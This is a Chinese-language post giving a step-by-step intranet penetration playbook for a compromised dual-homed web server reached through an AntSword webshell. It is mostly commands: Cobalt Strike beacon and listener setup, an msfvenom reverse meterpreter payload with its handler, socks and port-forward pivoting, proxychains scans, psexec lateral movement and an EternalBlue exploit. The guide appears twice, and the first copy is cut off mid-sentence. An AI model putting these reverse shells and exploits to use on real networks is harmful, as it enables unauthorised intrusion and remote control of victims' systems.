BroadcastChannel
https://channel.gandli.eu.org/
https://channel.gandli.eu.org/
### 🛠 双网卡环境内网渗透方案(基于 Cobalt Strike 与 Metasploit)
在你当前的网络环境中,双网卡 Web 服务器充当了一个桥梁,连接了外网与内网。你已经通过
---
## 🌐 一、使用 Cobalt Strike 进行内网渗透
### 1. 设置 CS 监听器(Listener)
首先,需要在你当前的 Kali 上设置一个 CS 监听器,用于与目标服务器建立连接。
- 步骤**:
1. 打开 Cobalt Strike 客户端,连接到你的 CS Team Server。
2. 导航到 **Cobalt Strike -> Listeners**,点击 **Add**。
3. 配置监听器:
- **Payload:
- Host: 你的 Kali IP 地址(公网或 VPS IP)
- Port: 80(或其他常用端口)
4. 点击 Save 以创建监听器。
### 2. 上传 CS 的 Beacon 到 Web 服务器
你已经通过蚁剑连接到 Web 服务器,接下来可以上传 CS 的 Beacon。
- 步骤**:
1. 在 CS 中生成 Payload:
- 导航到 **Attacks -> Packages -> Windows Executable (S)
- 选择刚刚创建的监听器,生成一个
2. 使用蚁剑将生成的文件上传到 Web 服务器上,并通过命令执行它:
3. 如果成功运行,CS 中会显示一个新的 Beacon 连接。
### 3. 配置 Socks Proxy 以渗透内网
为了通过 Web 服务器进一步渗透内网主机,可以利用 CS 的
- 步骤**:
1. 在 CS 中选择连接的 Beacon。
2. 右键 -> **Explore -> Socks Server**,启动 `Socks5` 代理(默认端口 `1080`)。
3. 在 Kali 上配置代理工具(如 `proxychains`),将其流量导向 CS 的 Socks 代理:
```bash
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
```
4. 使用 `proxychains` 运行内网扫描工具(如 `nmap`):
```bash
proxychains nmap -sT -Pn 192.168.1.0/24
```
### 4. 横向渗透和权限提升
- 利用 CS 的 **Elevate 功能,尝试提升权限。
- 使用 PsExec、WMI 等模块在内网进行横向移动:
---
## 🛠 二、使用 Metasploit 进行内网渗透
### 1. 利用蚁剑执行 MSF Payload
既然已经通过蚁剑获得了 Web 服务器的 Shell,可以直接通过 MSF 生成 Payload 并在 Web 服务器上执行。
- 步骤**:
1. 在 Kali 中生成 MSF 的反向 Shell Payload:
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP> LPORT=4444 -f exe -o meterpreter.exe
```
2. 使用蚁剑将 `meterpreter.exe` 上传到 Web 服务器,并执行:
```shell
shell:cmd.exe /c meterpreter.exe
```
### 2. 在 MSF 中捕获会话
- **步骤**:
1. 启动 `msfconsole` 并设置监听器:
```bash
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Kali IP>
set LPORT 4444
run
```
2. 如果成功,你将在 MSF 中获得一个 `meterpreter` 会话。
### 3. 设置 Meterpreter 的 Port Forwarding
- 如果 Web 服务器能访问内网主机,可以使用 `portfwd` 将内网端口转发到你的 Kali。
```shell
meterpreter > portfwd add -l 8888 -p 3389 -r 192.168.1.10
```
这里将 Web 服务器的 3389(RDP)端口转发到 Kali 的 8888 端口。
### 4. 使用 MSF 的 Socks Proxy 进行内网渗透
1. **在 meterpreter 中启动 socks 代理**:
```shell
meterpreter > run autoroute -s 192.168.1.0/24
meterpreter > run socks_proxy
```
2. **配置 proxychains**:
```bash
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
```
3. **通过 proxychains 进行内网扫描**:
```bash
proxychains nmap -sS -Pn 192.168.1.0/24
```
### 5. 横向渗透(MS17-010、EternalBlue)
- 使用 MSF 的 `exploit/windows/smb/ms17_010_eternalblue` 模块来进行内网主机的攻击:
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.20
set LHOST <Kali IP>
run
```
---
## 🔑 关键点总结**
1. Cobalt Strike 适合通过 Beacon 和 Socks 代理对内网进行隐蔽渗透。
2. Metasploit 提供强大的内网扫描、漏洞利用和横向移动能力。
3. 利用 双网卡服务器 作为桥梁,结合 CS 和 MSF 的代理功能,能有效地渗透无法直接访问的内网区域。
---
### 关键词
#CobaltStrike #Metasploit #内网渗透 #双网卡服务器 #蚁剑 #Socks代理 #横向渗透 #权限提升
在你当前的网络环境中,双网卡 Web 服务器充当了一个桥梁,连接了外网与内网。你已经通过
getshell 获取了 Web 服务器的权限,并通过蚁剑进行连接。接下来,我们将探讨如何使用 Cobalt Strike(CS) 和 Metasploit(MSF) 进行进一步的内网渗透。下面提供了基于两种工具的详细步骤。---
## 🌐 一、使用 Cobalt Strike 进行内网渗透
### 1. 设置 CS 监听器(Listener)
首先,需要在你当前的 Kali 上设置一个 CS 监听器,用于与目标服务器建立连接。
- 步骤**:
1. 打开 Cobalt Strike 客户端,连接到你的 CS Team Server。
2. 导航到 **Cobalt Strike -> Listeners**,点击 **Add**。
3. 配置监听器:
- **Payload:
windows/beacon_http/reverse_http- Host: 你的 Kali IP 地址(公网或 VPS IP)
- Port: 80(或其他常用端口)
4. 点击 Save 以创建监听器。
### 2. 上传 CS 的 Beacon 到 Web 服务器
你已经通过蚁剑连接到 Web 服务器,接下来可以上传 CS 的 Beacon。
- 步骤**:
1. 在 CS 中生成 Payload:
- 导航到 **Attacks -> Packages -> Windows Executable (S)
- 选择刚刚创建的监听器,生成一个
.exe 或 .dll 文件。2. 使用蚁剑将生成的文件上传到 Web 服务器上,并通过命令执行它:
shell:cmd.exe /c beacon.exe
3. 如果成功运行,CS 中会显示一个新的 Beacon 连接。
### 3. 配置 Socks Proxy 以渗透内网
为了通过 Web 服务器进一步渗透内网主机,可以利用 CS 的
Socks Proxy 功能。- 步骤**:
1. 在 CS 中选择连接的 Beacon。
2. 右键 -> **Explore -> Socks Server**,启动 `Socks5` 代理(默认端口 `1080`)。
3. 在 Kali 上配置代理工具(如 `proxychains`),将其流量导向 CS 的 Socks 代理:
```bash
echo "socks5 127.0.0.1 1080" >> /etc/proxychains.conf
```
4. 使用 `proxychains` 运行内网扫描工具(如 `nmap`):
```bash
proxychains nmap -sT -Pn 192.168.1.0/24
```
### 4. 横向渗透和权限提升
- 利用 CS 的 **Elevate 功能,尝试提升权限。
- 使用 PsExec、WMI 等模块在内网进行横向移动:
psexec \\192.168.1.10 -u admin -p password -c payload.exe
---
## 🛠 二、使用 Metasploit 进行内网渗透
### 1. 利用蚁剑执行 MSF Payload
既然已经通过蚁剑获得了 Web 服务器的 Shell,可以直接通过 MSF 生成 Payload 并在 Web 服务器上执行。
- 步骤**:
1. 在 Kali 中生成 MSF 的反向 Shell Payload:
```bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Kali IP> LPORT=4444 -f exe -o meterpreter.exe
```
2. 使用蚁剑将 `meterpreter.exe` 上传到 Web 服务器,并执行:
```shell
shell:cmd.exe /c meterpreter.exe
```
### 2. 在 MSF 中捕获会话
- **步骤**:
1. 启动 `msfconsole` 并设置监听器:
```bash
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Kali IP>
set LPORT 4444
run
```
2. 如果成功,你将在 MSF 中获得一个 `meterpreter` 会话。
### 3. 设置 Meterpreter 的 Port Forwarding
- 如果 Web 服务器能访问内网主机,可以使用 `portfwd` 将内网端口转发到你的 Kali。
```shell
meterpreter > portfwd add -l 8888 -p 3389 -r 192.168.1.10
```
这里将 Web 服务器的 3389(RDP)端口转发到 Kali 的 8888 端口。
### 4. 使用 MSF 的 Socks Proxy 进行内网渗透
1. **在 meterpreter 中启动 socks 代理**:
```shell
meterpreter > run autoroute -s 192.168.1.0/24
meterpreter > run socks_proxy
```
2. **配置 proxychains**:
```bash
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
```
3. **通过 proxychains 进行内网扫描**:
```bash
proxychains nmap -sS -Pn 192.168.1.0/24
```
### 5. 横向渗透(MS17-010、EternalBlue)
- 使用 MSF 的 `exploit/windows/smb/ms17_010_eternalblue` 模块来进行内网主机的攻击:
```bash
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.20
set LHOST <Kali IP>
run
```
---
## 🔑 关键点总结**
1. Cobalt Strike 适合通过 Beacon 和 Socks 代理对内网进行隐蔽渗透。
2. Metasploit 提供强大的内网扫描、漏洞利用和横向移动能力。
3. 利用 双网卡服务器 作为桥梁,结合 CS 和 MSF 的代理功能,能有效地渗透无法直接访问的内网区域。
---
### 关键词
#CobaltStrike #Metasploit #内网渗透 #双网卡服务器 #蚁剑 #Socks代理 #横向渗透 #权限提升